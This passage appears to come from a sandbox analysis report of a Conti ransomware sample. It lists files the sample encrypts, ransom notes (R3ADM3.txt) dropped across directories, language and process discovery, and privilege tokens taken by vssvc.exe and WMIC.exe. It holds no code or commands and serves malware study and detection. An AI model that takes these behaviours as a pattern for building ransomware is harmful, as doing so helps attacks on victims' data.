File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ZO1X14N3\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Public\Documents\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Public\Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Public\Downloads\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Public\Libraries\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\MN6S8FGK\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Public\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Games\Chess\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Links\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\N7ZQRMOO\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Public\Music\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\C906A748\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Documents\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Music\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Admin\Videos\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Users\Public\Videos\desktop.ini	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A

Drops file in Program Files directory

Description	Indicator	Process	Target
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files (x86)\Common Files\System\ado\ja-JP\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01931J.JPG	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Atlantic\Azores	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\PST8	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\CGMIMP32.HLP	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0150861.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Yekaterinburg	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Flow.xml	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02097_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14866_.GIF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME30.CSS	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\sw\LC_MESSAGES\vlc.mo	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files (x86)\Common Files\Adobe\Acrobat\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PRRT.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DVDHM.POC	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR21F.GIF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\Discussion.gta	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chihuahua	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\SoftBlue\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Winnipeg	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Reykjavik	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP.bat	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\1033\MSOINTL.REST.IDX_DLL	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files\Common Files\Microsoft Shared\ink\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files\Common Files\Microsoft Shared\ink\pt-BR\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Waveform.eftx	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\btn-previous-static.png	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-spi-quicksearch_ja.jar	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Desert.css	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\README-JDK.html	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AN03500_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files (x86)\Common Files\Adobe\Help\en_US\Adobe Reader\9.0\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_spellcheck.gif	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00453_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18201_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Internet Explorer\ie9props.propdesc	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\7-Zip\Lang\eu.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files\VideoLAN\VLC\lua\extensions\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Slate.css	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Java\jre7\lib\net.properties	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00014_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Tbilisi	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImages.jpg	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\7-Zip\Lang\zh-tw.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Java\jre7\COPYRIGHT	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Nassau	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File created	C:\Program Files\Mozilla Firefox\browser\VisualElements\R3ADM3.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02578_.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\epl-v10.html	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_zh_CN.jar	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BrightOrange\BUTTON.GIF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\grid_(cm).wmf	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0174635.WMF	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FORM.JS	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
File opened for modification	C:\Program Files\7-Zip\Lang\be.txt	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A

Browser Information Discovery

discovery

System Location Discovery: System Language Discovery

discovery

Description	Indicator	Process	Target
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A

Suspicious behavior: EnumeratesProcesses

Description	Indicator	Process	Target
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A
N/A	N/A	C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe	N/A

Suspicious use of AdjustPrivilegeToken

Description	Indicator	Process	Target
Token: SeBackupPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeAuditPrivilege	N/A	C:\Windows\system32\vssvc.exe	N/A
Token: SeIncreaseQuotaPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeSecurityPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeTakeOwnershipPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeLoadDriverPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeSystemProfilePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeSystemtimePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeProfSingleProcessPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeIncBasePriorityPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeCreatePagefilePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeBackupPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeRestorePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeShutdownPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeDebugPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeSystemEnvironmentPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeRemoteShutdownPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeUndockPrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: SeManageVolumePrivilege	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: 33	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: 34	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
Token: 35	N/A	C:\Windows\System32\wbem\WMIC.exe	N/A
